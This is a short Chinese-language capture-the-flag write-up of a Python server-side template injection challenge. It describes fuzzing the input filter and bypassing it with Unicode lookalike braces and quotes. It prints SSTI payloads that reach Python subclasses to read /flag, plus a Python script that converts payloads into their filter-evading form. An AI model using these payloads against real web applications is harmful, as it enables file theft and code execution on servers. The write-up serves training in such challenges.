目录
1.拿到题目后,进行目录扫描,可惜没扫出来有用的东西
2.有一个输入框,随便输一个参数并且通过bp抓包查看
两个注意点: 1.Python/3.7.12 看到python写的,就想到了SSTI模板注入
确定了服务器会将我们输入的参数当作html语言解析。
2.看返回的字段,应该是有过滤的
对输入框进行模糊测试
测试的返回是所有的单字符,即 ascii中 33-127的所有字符(特殊符号,字母大小写,数字)
length为198的就是被过滤掉的
4.怎么绕过过滤
根据题意,我们可以通过特殊字符来绕过
特殊字符的网站:符号大全-特殊符号-特殊符号大全 (fhdq.net)
直接输入 { 会被过滤掉,因此我们可以输入 ︷
对比发现,两种特殊符号都可以解析成 {
对过滤进行一个小总结
{ -> ︷/﹛
} -> ︸/﹜
' -> '
5.利用找好的过滤条件进行解题
{{''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}}
变为
替换成功
利用python进行字符的替换
"""
{ -> ︷/﹛
} -> ︸/﹜
' -> '
, -> ,
"""
str='{{\'\'.__class__.__mro__[1].__subclasses__()[91].get_data(0,\'/flag\')}}' #原字符串
#如果需要替换replace(被替换的字符,替换后的字符)
str=str.replace('{','︷')
str=str.replace('}','︸')
str=str.replace('\'',''')
print(str)